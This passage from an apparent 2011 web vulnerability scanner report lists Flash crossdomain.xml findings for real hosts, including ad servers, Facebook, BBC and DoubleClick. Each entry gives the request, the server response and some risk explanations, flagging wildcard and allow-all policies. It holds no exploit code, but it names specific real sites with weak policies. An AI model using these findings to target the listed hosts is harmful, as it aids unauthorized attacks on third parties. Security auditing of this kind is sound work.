
Severity:	High
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tf.nexac.com

Response

4.73. http://ttwbs.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ttwbs.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Thu, 16 Jun 2011 15:52:18 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 441

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.74. http://va.px.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:46 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.75. http://wasc.homedepot.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wasc.homedepot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wasc.homedepot.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:39 GMT
Server: Omniture DC/2.0.0
xserver: www38
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.76. http://www.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:27 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:38 GMT
ETag: "925bac-94-46712311e8a80"
Accept-Ranges: bytes
Content-Length: 148
Vary: Accept-Encoding
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.imgsynergy.com"/>
</cross-domain-policy>

4.77. http://www.wunderground.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:46 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Tue, 22 Mar 2011 16:07:56 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.78. http://www2.sesamestats.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www2.sesamestats.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.sesamestats.com

Response

HTTP/1.0 200 OK
Pragma: "No-Cache"
Content-Length: 268
Content-Type: text/xml
Last-Modified: Fri, 12 Sep 2008 17:47:54 GMT
Accept-Ranges: bytes
ETag: "3a3269afff14c91:61c"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP CURa ADMa DEVa TAIa PSAa IVAi OUR BUS IND UNI COM NAV"
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 18:32:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.79. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:08:11 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.80. http://ads.bridgetrack.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.bridgetrack.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 541
Content-Type: text/html
Date: Fri, 17 Jun 2011 10:42:05 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

4.81. http://ads.cleveland.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.cleveland.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.cleveland.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:39 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 08:56:10 GMT
ETag: "38410f-284-9fd87e80"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:18:39 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

4.82. http://ads.nj.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.nj.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.nj.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:04 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 09:02:58 GMT
ETag: "2f0192-284-b82a1480"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:04 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

4.83. http://ads.oregonlive.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.oregonlive.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:17 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 09:02:58 GMT
ETag: "2f0192-284-b82a1480"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:17 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

4.84. http://ads1.msn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Thu, 16 Jun 2011 11:25:58 GMT
Content-Length: 616
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 17:47:09 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Wed, 06 Jun 2012 16:51:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="global.msads.net" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.msnbc.msn.com" />
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...

4.85. http://adx.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adx.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Fri, 17 Jun 2011 10:11:55 GMT
Expires: Sat, 18 Jun 2011 10:11:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.86. http://check4.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: check4.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.245.57
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.87. http://check6.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: check6.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.71.104
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.88. http://edge.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://edge.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 15 Jun 2011 21:11:18 GMT
ETag: "30c0d-14a-4a5c697ef6980"
Content-Type: application/xml
Date: Thu, 16 Jun 2011 10:51:03 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.89. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=23
Expires: Thu, 16 Jun 2011 12:27:17 GMT
Date: Thu, 16 Jun 2011 12:26:54 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.90. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 15 Jun 2011 21:25:19 GMT
Expires: Thu, 16 Jun 2011 21:25:19 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 50627

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.91. http://login.dotomi.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-o04
Last-Modified: Tue, 23 Nov 2010 00:49:01 GMT
ETag: "10b0060-a1-495adbd151940"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

4.92. http://media.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Date: Thu, 16 Jun 2011 11:25:05 GMT
Connection: close
Cache-Control: public, max-age=900

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.93. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=109
Expires: Thu, 16 Jun 2011 12:28:43 GMT
Date: Thu, 16 Jun 2011 12:26:54 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
